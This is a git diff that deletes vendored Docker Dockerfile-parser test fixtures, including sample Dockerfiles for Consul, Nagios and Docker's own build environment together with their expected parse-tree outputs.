-y --no-install-recommends git golang ca-certificates \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/brimstone/consuldock \ - && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && rm -rf $GOPATH - - - - diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile deleted file mode 100644 index 1d65578794..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile +++ /dev/null @@ -1,3 +0,0 @@ -FROM busybox - -ENV PATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile deleted file mode 100644 index d1be4596c7..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile +++ /dev/null @@ -1 +0,0 @@ -CMD [ "echo", [ "nested json" ] ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile deleted file mode 100644 index 00b444cba5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Seongyeol Lim - -COPY . /go/src/github.com/docker/docker -ADD . 
/ -ADD null / -COPY nullfile /tmp -ADD [ "vimrc", "/tmp" ] -COPY [ "bashrc", "/tmp" ] -COPY [ "test file", "/tmp" ] -ADD [ "test file", "/tmp/test file" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result deleted file mode 100644 index 85aee64018..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Seongyeol Lim ") -(copy "." "/go/src/github.com/docker/docker") -(add "." "/") -(add "null" "/") -(copy "nullfile" "/tmp") -(add "vimrc" "/tmp") -(copy "bashrc" "/tmp") -(copy "test file" "/tmp") -(add "test file" "/tmp/test file") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile deleted file mode 100644 index 0364ef9d96..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile +++ /dev/null @@ -1,26 +0,0 @@ -#escape=\ -FROM brimstone/ubuntu:14.04 - -MAINTAINER brimstone@the.narro.ws - -# TORUN -v /var/run/docker.sock:/var/run/docker.sock - -ENV GOPATH /go - -# Set our command -ENTRYPOINT ["/usr/local/bin/consuldock"] - -# Install the packages we need, clean up after them and us -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - && apt-get install -y --no-install-recommends git golang ca-certificates \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/brimstone/consuldock \ - && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && 
rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result deleted file mode 100644 index 227f748cda..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result +++ /dev/null @@ -1,5 +0,0 @@ -(from "brimstone/ubuntu:14.04") -(maintainer "brimstone@the.narro.ws") -(env "GOPATH" "/go") -(entrypoint "/usr/local/bin/consuldock") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/brimstone/consuldock && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile deleted file mode 100644 index 25ae352166..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile +++ /dev/null @@ -1,52 +0,0 @@ -FROM brimstone/ubuntu:14.04 - -CMD [] - -ENTRYPOINT ["/usr/bin/consul", "agent", "-server", "-data-dir=/consul", "-client=0.0.0.0", "-ui-dir=/webui"] - -EXPOSE 8500 8600 8400 8301 8302 - -RUN apt-get update \ - && apt-get install -y unzip wget \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists - -RUN cd /tmp \ - && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ - -O web_ui.zip \ - && unzip web_ui.zip \ - && mv dist /webui \ - && rm web_ui.zip - -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean 
\ - && apt-get install -y --no-install-recommends unzip wget \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && cd /tmp \ - && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip \ - -O web_ui.zip \ - && unzip web_ui.zip \ - && mv dist /webui \ - && rm web_ui.zip \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* - -ENV GOPATH /go - -RUN apt-get update \ - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \ - && apt-get install -y --no-install-recommends git golang ca-certificates build-essential \ - && apt-get clean \ - && rm -rf /var/lib/apt/lists \ - - && go get -v github.com/hashicorp/consul \ - && mv $GOPATH/bin/consul /usr/bin/consul \ - - && dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \ - && apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \ - && rm /tmp/dpkg.* \ - && rm -rf $GOPATH diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result deleted file mode 100644 index 16492e516a..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result +++ /dev/null @@ -1,9 +0,0 @@ -(from "brimstone/ubuntu:14.04") -(cmd) -(entrypoint "/usr/bin/consul" "agent" "-server" "-data-dir=/consul" "-client=0.0.0.0" "-ui-dir=/webui") -(expose "8500" "8600" "8400" "8301" "8302") -(run "apt-get update && apt-get install -y unzip wget \t&& apt-get clean \t&& rm -rf /var/lib/apt/lists") -(run "cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends unzip wget && apt-get 
clean && rm -rf /var/lib/apt/lists && cd /tmp && wget https://dl.bintray.com/mitchellh/consul/0.3.1_web_ui.zip -O web_ui.zip && unzip web_ui.zip && mv dist /webui && rm web_ui.zip \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.*") -(env "GOPATH" "/go") -(run "apt-get update \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean && apt-get install -y --no-install-recommends git golang ca-certificates build-essential && apt-get clean && rm -rf /var/lib/apt/lists \t&& go get -v github.com/hashicorp/consul \t&& mv $GOPATH/bin/consul /usr/bin/consul \t&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \t&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \t&& rm /tmp/dpkg.* \t&& rm -rf $GOPATH") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile deleted file mode 100644 index 42b324e77b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM ubuntu:14.04 - -RUN echo hello\ - world\ - goodnight \ - moon\ - light\ -ning -RUN echo hello \ - world -RUN echo hello \ -world -RUN echo hello \ -goodbye\ -frog -RUN echo hello \ -world -RUN echo hi \ - \ - world \ -\ - good\ -\ -night -RUN echo goodbye\ -frog -RUN echo good\ -bye\ -frog - -RUN echo hello \ -# this is a comment - -# this is a comment with a blank line surrounding it - -this is some more useful stuff diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result deleted file mode 100644 index 268ae073c8..0000000000 --- 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result +++ /dev/null @@ -1,10 +0,0 @@ -(from "ubuntu:14.04") -(run "echo hello world goodnight moon lightning") -(run "echo hello world") -(run "echo hello world") -(run "echo hello goodbyefrog") -(run "echo hello world") -(run "echo hi world goodnight") -(run "echo goodbyefrog") -(run "echo goodbyefrog") -(run "echo hello this is some more useful stuff") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile deleted file mode 100644 index 8ccb71a578..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile +++ /dev/null @@ -1,54 +0,0 @@ -FROM cpuguy83/ubuntu -ENV NAGIOS_HOME /opt/nagios -ENV NAGIOS_USER nagios -ENV NAGIOS_GROUP nagios -ENV NAGIOS_CMDUSER nagios -ENV NAGIOS_CMDGROUP nagios -ENV NAGIOSADMIN_USER nagiosadmin -ENV NAGIOSADMIN_PASS nagios -ENV APACHE_RUN_USER nagios -ENV APACHE_RUN_GROUP nagios -ENV NAGIOS_TIMEZONE UTC - -RUN sed -i 's/universe/universe multiverse/' /etc/apt/sources.list -RUN apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx -RUN ( egrep -i "^${NAGIOS_GROUP}" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i "^${NAGIOS_CMDGROUP}" /etc/group || groupadd $NAGIOS_CMDGROUP ) -RUN ( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER ) - -ADD http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3 /tmp/nagios.tar.gz -RUN cd /tmp && tar -zxvf nagios.tar.gz && 
cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker --with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf -ADD http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz /tmp/ -RUN cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install - -RUN sed -i.bak 's/.*\=www\-data//g' /etc/apache2/envvars -RUN export DOC_ROOT="DocumentRoot $(echo $NAGIOS_HOME/share)"; sed -i "s,DocumentRoot.*,$DOC_ROOT," /etc/apache2/sites-enabled/000-default - -RUN ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo - -RUN echo "use_timezone=$NAGIOS_TIMEZONE" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo "SetEnv TZ \"${NAGIOS_TIMEZONE}\"" >> /etc/apache2/conf.d/nagios.conf - -RUN mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs -RUN echo "cfg_dir=${NAGIOS_HOME}/etc/conf.d" >> ${NAGIOS_HOME}/etc/nagios.cfg -RUN echo "cfg_dir=${NAGIOS_HOME}/etc/monitor" >> ${NAGIOS_HOME}/etc/nagios.cfg -RUN download-mibs && echo "mibs +ALL" > /etc/snmp/snmp.conf - -RUN sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && \ - sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg -RUN cp /etc/services /var/spool/postfix/etc/ - -RUN mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix -ADD nagios.init /etc/sv/nagios/run -ADD apache.init /etc/sv/apache/run -ADD postfix.init /etc/sv/postfix/run -ADD postfix.stop /etc/sv/postfix/finish - -ADD start.sh /usr/local/bin/start_nagios - 
-ENV APACHE_LOCK_DIR /var/run -ENV APACHE_LOG_DIR /var/log/apache2 - -EXPOSE 80 - -VOLUME ["/opt/nagios/var", "/opt/nagios/etc", "/opt/nagios/libexec", "/var/log/apache2", "/usr/share/snmp/mibs"] - -CMD ["/usr/local/bin/start_nagios"] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result deleted file mode 100644 index 25dd3ddfe5..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result +++ /dev/null @@ -1,40 +0,0 @@ -(from "cpuguy83/ubuntu") -(env "NAGIOS_HOME" "/opt/nagios") -(env "NAGIOS_USER" "nagios") -(env "NAGIOS_GROUP" "nagios") -(env "NAGIOS_CMDUSER" "nagios") -(env "NAGIOS_CMDGROUP" "nagios") -(env "NAGIOSADMIN_USER" "nagiosadmin") -(env "NAGIOSADMIN_PASS" "nagios") -(env "APACHE_RUN_USER" "nagios") -(env "APACHE_RUN_GROUP" "nagios") -(env "NAGIOS_TIMEZONE" "UTC") -(run "sed -i 's/universe/universe multiverse/' /etc/apt/sources.list") -(run "apt-get update && apt-get install -y iputils-ping netcat build-essential snmp snmpd snmp-mibs-downloader php5-cli apache2 libapache2-mod-php5 runit bc postfix bsd-mailx") -(run "( egrep -i \"^${NAGIOS_GROUP}\" /etc/group || groupadd $NAGIOS_GROUP ) && ( egrep -i \"^${NAGIOS_CMDGROUP}\" /etc/group || groupadd $NAGIOS_CMDGROUP )") -(run "( id -u $NAGIOS_USER || useradd --system $NAGIOS_USER -g $NAGIOS_GROUP -d $NAGIOS_HOME ) && ( id -u $NAGIOS_CMDUSER || useradd --system -d $NAGIOS_HOME -g $NAGIOS_CMDGROUP $NAGIOS_CMDUSER )") -(add "http://downloads.sourceforge.net/project/nagios/nagios-3.x/nagios-3.5.1/nagios-3.5.1.tar.gz?r=http%3A%2F%2Fwww.nagios.org%2Fdownload%2Fcore%2Fthanks%2F%3Ft%3D1398863696&ts=1398863718&use_mirror=superb-dca3" "/tmp/nagios.tar.gz") -(run "cd /tmp && tar -zxvf nagios.tar.gz && cd nagios && ./configure --prefix=${NAGIOS_HOME} --exec-prefix=${NAGIOS_HOME} --enable-event-broker 
--with-nagios-command-user=${NAGIOS_CMDUSER} --with-command-group=${NAGIOS_CMDGROUP} --with-nagios-user=${NAGIOS_USER} --with-nagios-group=${NAGIOS_GROUP} && make all && make install && make install-config && make install-commandmode && cp sample-config/httpd.conf /etc/apache2/conf.d/nagios.conf") -(add "http://www.nagios-plugins.org/download/nagios-plugins-1.5.tar.gz" "/tmp/") -(run "cd /tmp && tar -zxvf nagios-plugins-1.5.tar.gz && cd nagios-plugins-1.5 && ./configure --prefix=${NAGIOS_HOME} && make && make install") -(run "sed -i.bak 's/.*\\=www\\-data//g' /etc/apache2/envvars") -(run "export DOC_ROOT=\"DocumentRoot $(echo $NAGIOS_HOME/share)\"; sed -i \"s,DocumentRoot.*,$DOC_ROOT,\" /etc/apache2/sites-enabled/000-default") -(run "ln -s ${NAGIOS_HOME}/bin/nagios /usr/local/bin/nagios && mkdir -p /usr/share/snmp/mibs && chmod 0755 /usr/share/snmp/mibs && touch /usr/share/snmp/mibs/.foo") -(run "echo \"use_timezone=$NAGIOS_TIMEZONE\" >> ${NAGIOS_HOME}/etc/nagios.cfg && echo \"SetEnv TZ \\\"${NAGIOS_TIMEZONE}\\\"\" >> /etc/apache2/conf.d/nagios.conf") -(run "mkdir -p ${NAGIOS_HOME}/etc/conf.d && mkdir -p ${NAGIOS_HOME}/etc/monitor && ln -s /usr/share/snmp/mibs ${NAGIOS_HOME}/libexec/mibs") -(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/conf.d\" >> ${NAGIOS_HOME}/etc/nagios.cfg") -(run "echo \"cfg_dir=${NAGIOS_HOME}/etc/monitor\" >> ${NAGIOS_HOME}/etc/nagios.cfg") -(run "download-mibs && echo \"mibs +ALL\" > /etc/snmp/snmp.conf") -(run "sed -i 's,/bin/mail,/usr/bin/mail,' /opt/nagios/etc/objects/commands.cfg && sed -i 's,/usr/usr,/usr,' /opt/nagios/etc/objects/commands.cfg") -(run "cp /etc/services /var/spool/postfix/etc/") -(run "mkdir -p /etc/sv/nagios && mkdir -p /etc/sv/apache && rm -rf /etc/sv/getty-5 && mkdir -p /etc/sv/postfix") -(add "nagios.init" "/etc/sv/nagios/run") -(add "apache.init" "/etc/sv/apache/run") -(add "postfix.init" "/etc/sv/postfix/run") -(add "postfix.stop" "/etc/sv/postfix/finish") -(add "start.sh" "/usr/local/bin/start_nagios") -(env 
"APACHE_LOCK_DIR" "/var/run") -(env "APACHE_LOG_DIR" "/var/log/apache2") -(expose "80") -(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs") -(cmd "/usr/local/bin/start_nagios") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile deleted file mode 100644 index 99fbe55be0..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile +++ /dev/null @@ -1,103 +0,0 @@ -# This file describes the standard way to build Docker, using docker -# -# Usage: -# -# # Assemble the full dev environment. This is slow the first time. -# docker build -t docker . -# -# # Mount your source in an interactive container for quick testing: -# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash -# -# # Run the test suite: -# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py -# -# # Publish a release: -# docker run --privileged \ -# -e AWS_S3_BUCKET=baz \ -# -e AWS_ACCESS_KEY=foo \ -# -e AWS_SECRET_KEY=bar \ -# -e GPG_PASSPHRASE=gloubiboulga \ -# docker hack/release.sh -# -# Note: AppArmor used to mess with privileged mode, but this is no longer -# the case. Therefore, you don't have to disable it anymore. 
-# - -FROM ubuntu:14.04 -MAINTAINER Tianon Gravi (@tianon) - -# Packaged dependencies -RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \ - apt-utils \ - aufs-tools \ - automake \ - btrfs-tools \ - build-essential \ - curl \ - dpkg-sig \ - git \ - iptables \ - libapparmor-dev \ - libcap-dev \ - libsqlite3-dev \ - mercurial \ - pandoc \ - parallel \ - reprepro \ - ruby1.9.1 \ - ruby1.9.1-dev \ - s3cmd=1.1.0* \ - --no-install-recommends - -# Get lvm2 source for compiling statically -RUN git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103 -# see https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags -# note: we don't use "git clone -b" above because it then spews big nasty warnings about 'detached HEAD' state that we can't silence as easily as we can silence them using "git checkout" directly - -# Compile and install lvm2 -RUN cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper -# see https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL - -# Install Go -RUN curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH /go:/go/src/github.com/docker/docker/vendor -RUN cd /usr/local/go/src && ./make.bash --no-clean 2>&1 - -# Compile Go for cross compilation -ENV DOCKER_CROSSPLATFORMS \ - linux/386 linux/arm \ - darwin/amd64 darwin/386 \ - freebsd/amd64 freebsd/386 freebsd/arm -# (set an explicit GOARM of 5 for maximum compatibility) -ENV GOARM 5 -RUN cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done' - -# Grab Go's cover tool for dead-simple code coverage testing -RUN go get golang.org/x/tools/cmd/cover - -# TODO replace FPM with some very minimal debhelper stuff -RUN gem install --no-rdoc --no-ri fpm --version 1.0.2 - -# Get the 
"busybox" image source so we can build locally instead of pulling -RUN git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox - -# Setup s3cmd config -RUN /bin/echo -e '[default]\naccess_key=$AWS_ACCESS_KEY\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg - -# Set user.email so crosbymichael's in-container merge commits go smoothly -RUN git config --global user.email 'docker-dummy@example.com' - -# Add an unprivileged user to be used for tests which need it -RUN groupadd -r docker -RUN useradd --create-home --gid docker unprivilegeduser - -VOLUME /var/lib/docker -WORKDIR /go/src/github.com/docker/docker -ENV DOCKER_BUILDTAGS apparmor selinux - -# Wrap all commands in the "docker-in-docker" script to allow nested containers -ENTRYPOINT ["hack/dind"] - -# Upload docker source -COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result deleted file mode 100644 index d032f9bac4..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result +++ /dev/null @@ -1,24 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Tianon Gravi (@tianon)") -(run "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -yq \tapt-utils \taufs-tools \tautomake \tbtrfs-tools \tbuild-essential \tcurl \tdpkg-sig \tgit \tiptables \tlibapparmor-dev \tlibcap-dev \tlibsqlite3-dev \tmercurial \tpandoc \tparallel \treprepro \truby1.9.1 \truby1.9.1-dev \ts3cmd=1.1.0* \t--no-install-recommends") -(run "git clone --no-checkout https://git.fedorahosted.org/git/lvm2.git /usr/local/lvm2 && cd /usr/local/lvm2 && git checkout -q v2_02_103") -(run "cd /usr/local/lvm2 && ./configure --enable-static_link && make device-mapper && make install_device-mapper") -(run "curl -sSL https://golang.org/dl/go1.3.src.tar.gz | tar -v -C /usr/local -xz") -(env "PATH" "/usr/local/go/bin:$PATH") -(env 
"GOPATH" "/go:/go/src/github.com/docker/docker/vendor") -(run "cd /usr/local/go/src && ./make.bash --no-clean 2>&1") -(env "DOCKER_CROSSPLATFORMS" "linux/386 linux/arm \tdarwin/amd64 darwin/386 \tfreebsd/amd64 freebsd/386 freebsd/arm") -(env "GOARM" "5") -(run "cd /usr/local/go/src && bash -xc 'for platform in $DOCKER_CROSSPLATFORMS; do GOOS=${platform%/*} GOARCH=${platform##*/} ./make.bash --no-clean 2>&1; done'") -(run "go get golang.org/x/tools/cmd/cover") -(run "gem install --no-rdoc --no-ri fpm --version 1.0.2") -(run "git clone -b buildroot-2014.02 https://github.com/jpetazzo/docker-busybox.git /docker-busybox") -(run "/bin/echo -e '[default]\\naccess_key=$AWS_ACCESS_KEY\\nsecret_key=$AWS_SECRET_KEY' > /.s3cfg") -(run "git config --global user.email 'docker-dummy@example.com'") -(run "groupadd -r docker") -(run "useradd --create-home --gid docker unprivilegeduser") -(volume "/var/lib/docker") -(workdir "/go/src/github.com/docker/docker") -(env "DOCKER_BUILDTAGS" "apparmor selinux") -(entrypoint "hack/dind") -(copy "." 
"/go/src/github.com/docker/docker") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile deleted file mode 100644 index 08fa18acec..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile +++ /dev/null @@ -1,23 +0,0 @@ -FROM ubuntu -ENV name value -ENV name=value -ENV name=value name2=value2 -ENV name="value value1" -ENV name=value\ value2 -ENV name="value'quote space'value2" -ENV name='value"double quote"value2' -ENV name=value\ value2 name2=value2\ value3 -ENV name="a\"b" -ENV name="a\'b" -ENV name='a\'b' -ENV name='a\'b'' -ENV name='a\"b' -ENV name="''" -# don't put anything after the next line - it must be the last line of the -# Dockerfile and it must end with \ -ENV name=value \ - name1=value1 \ - name2="value2a \ - value2b" \ - name3="value3a\n\"value3b\"" \ - name4="value4a\\nvalue4b" \ diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result deleted file mode 100644 index ba0a6dd7cb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result +++ /dev/null @@ -1,16 +0,0 @@ -(from "ubuntu") -(env "name" "value") -(env "name" "value") -(env "name" "value" "name2" "value2") -(env "name" "\"value value1\"") -(env "name" "value\\ value2") -(env "name" "\"value'quote space'value2\"") -(env "name" "'value\"double quote\"value2'") -(env "name" "value\\ value2" "name2" "value2\\ value3") -(env "name" "\"a\\\"b\"") -(env "name" "\"a\\'b\"") -(env "name" "'a\\'b'") -(env "name" "'a\\'b''") -(env "name" "'a\\\"b'") -(env "name" "\"''\"") -(env "name" "value" "name1" "value1" "name2" "\"value2a value2b\"" "name3" "\"value3a\\n\\\"value3b\\\"\"" "name4" "\"value4a\\\\nvalue4b\"") diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile deleted file mode 100644 index 6def7efdcd..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -# Comment here. Should not be looking for the following parser directive. -# Hence the following line will be ignored, and the subsequent backslash -# continuation will be the default. -# escape = ` - -FROM image -MAINTAINER foo@bar.com -ENV GOPATH \ -\go \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result deleted file mode 100644 index 21522a880b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result +++ /dev/null @@ -1,3 +0,0 @@ -(from "image") -(maintainer "foo@bar.com") -(env "GOPATH" "\\go") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile deleted file mode 100644 index 08a8cc4326..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -# escape = `` -# There is no white space line after the directives. This still succeeds, but goes -# against best practices. 
